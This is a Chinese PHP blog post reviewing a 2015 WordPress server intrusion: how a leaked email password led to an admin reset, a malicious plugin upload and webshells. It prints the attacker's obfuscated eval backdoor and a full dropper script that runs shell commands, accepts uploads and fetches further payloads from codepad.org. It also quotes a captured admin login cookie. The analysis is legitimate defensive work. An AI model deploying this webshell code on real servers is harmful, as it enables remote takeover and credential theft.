安静
PHP技术博客

151110 服务器入侵复盘

互联网的黑客人事是越来越专业了,尽可能的数据挖掘,历史追溯,去寻找你的漏洞。前2天的草榴,前段时间的网易,总之人在互联网总会被挨刀。废话多了看文章。

大概过程:

黑客通过网易密码泄露中的邮箱,并且查阅相关邮件内容,得知某站存在,遂重置密码,登录后台,上传插件,激活木马。

总结:

互联网的每一个大事件其实都有可能跟你息息相关。

中午14点多收到阿里云短信服务器有密码并且隔离了,遂登录阿里云查看

木马文件:

wp-includes/media-bak.php

看了下创建时间 14:10

木马内容

    $qV = "stop_";
    $s20 = strtoupper($qV[4] . $qV[3] . $qV[2] . $qV[0] . $qV[1]);
    if (isset(${$s20}['dak'])) {
        eval(${$s20}['dak']);
    }

    //一句话木马 $_POST['dak']

根据木马文件访问查看黑客访问相关信息

    cat www.80aj.com.log | grep '10/Nov/2015' | grep php | grep 200 | awk '{print $1"\t"$4$5"\t"$9"\t"$6"\t"$7}' | grep php 

    173.252.193.210 [10/Nov/2015:14:09:59+0800] 200 "GET    /wp-login.php?redirect_to=http%3A%2F%2Fwww.80aj.com%2Fwp-admin%2F&reauth=1
    173.252.193.210 [10/Nov/2015:14:10:01+0800] 200 "GET    /wp-admin/plugin-install.php?tab=upload
    173.252.193.210 [10/Nov/2015:14:10:04+0800] 200 "POST   /wp-admin/update.php?action=upload-plugin
    173.252.193.210 [10/Nov/2015:14:10:05+0800] 200 "GET    /wp-content/uploads/2015/11/1447135650.php?test=1
    173.252.193.210 [10/Nov/2015:14:10:05+0800] 200 "POST   /wp-content/uploads/2015/11/1447135650.php
    173.252.193.210 [10/Nov/2015:14:10:06+0800] 200 "POST   /wp-includes/media-bak.php
    173.252.193.210 [10/Nov/2015:14:10:07+0800] 200 "GET    /wp-includes/class-wp-upgrade.php

进入 wp-content/uploads/2015/11/ 发现文件xx.php,文件大概思路受访请求带上test会主动在wp-include目录下载3个文件,内容来自 codepad.org 在线代码调试网站

    if(isset($_GET['test']) && $_GET['test']){
        echo 261000;
    //    $PHP_SELF = basename(__FILE__);
    //    rename($PHP_SELF,'new_'.$PHP_SELF);
    }elseif(isset($_GET['info']) && $_GET['info']){
        echo phpinfo();
    }elseif(isset($_GET['eval']) && $_GET['eval']){
        $qV = "stop_";
        $s20 = strtoupper($qV[4] . $qV[3] . $qV[2] . $qV[0] . $qV[1]);
        if (isset(${$s20}['dak'])) {
            eval(${$s20}['dak']);
        }
    }elseif(isset($_GET['go']) && $_GET['go']){
        $n = substr_count(substr(dirname(__FILE__),intval(strpos(dirname(__FILE__),'wp-content'))), "/");
        $path_pre = str_repeat('../',$n+1);
        $in_path = $path_pre.'wp-includes/';
        if(@file_put_contents($in_path.'media-bak.php',@file_get_contents('http://codepad.org/Uk6hqTZe/raw.php'))){
            echo '|YS[dak]';
        }else{
            echo '|YF';
        }
        if(@file_put_contents($in_path.'class-wp-upgrade.php',@file_get_contents('http://codepad.org/v6xhqhy7/raw.php'))){
            echo '|DS[wso]';
        }else{
            echo '|DF';
        }
        if(@file_put_contents($in_path.'class-wp-upload.php',@file_get_contents('http://codepad.org/ZSvhCPZE/raw.php'))){
            echo '|XS';
        }else{
            echo '|XF';
        }
    }else{
        $path = isset($_POST['path'])?$_POST['path']:dirname(__FILE__);
        if($_POST['url']){
            foreach($_POST['url'] as $url){
                $filename = $url['name'];
    //            $link = $url['link'];
                $con = $url['con'];
                if($a = @file_put_contents($path.$filename,base64_decode($con))){
                    echo '|'.$filename.' success';
                }else{
                    if($a = @file_put_contents($filename,base64_decode($con))){
                        echo '|ThisPath-'.$filename.' success';
                    }else{
                        echo '|'.$filename.' fail';
                    }
    //                echo '|'.$filename.' fail';
                }
            }
            $PHP_SELF = basename(__FILE__);
            rename($PHP_SELF,'new_up.php');
        }else{
            $c=$_GET['cmd'];
            system($c);
            $p=$_SERVER["DOCUMENT_ROOT"];
            $yoco=dirname(__FILE__);
            echo <<<HTML
        <form enctype="multipart/form-data"  method="POST">
        Path:$p<br>
        <input name="file" type="file"><br>
        Ŀ��:<br>
        <input size="48" value="$yoco/" name="pt" type="text"><br>
        <input type="submit" value="Upload">
        $tend
    HTML;
            if (isset($_POST["pt"])){
                $uploadfile = $_POST["pt"].$_FILES["file"]["name"];
                if ($_POST["pt"]==""){$uploadfile = $_FILES["file"]["name"];}
                if (copy($_FILES["file"]["tmp_name"], $uploadfile)){
                    echo"uploaded:$uploadfilen";
                    echo"Size:".$_FILES["file"]["size"]."n";
                }else {
                    print "Error:n";
                }
            }
        }
    }

其次 class-wp-upgrade.php 这个文件会获取用户请求的各种cookie,伪装成error_log去获取更多的cookie

发现其中有一条内容为 :

    ["wordpress_logged_in_42b76570a501a4b13a26d8fda417c568"]=>
      string(126) "weiwei|1447308597|3pnLyBYybwZbhNuW2eIegvzYJz79s2rkZx4zaIm7PTq|d667fceecc9ab854fffa28bcb8cde9ea3eca0e38c421becee0f7dba0cc8899bf"

这个是我多年前同事的账号给,并且是admin权限,xxx@126.com ,just soso 太搞了。 荆轲刺秦王

赞(0) 打赏
未经允许不得转载:AJ's Blog » 151110 服务器入侵复盘
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏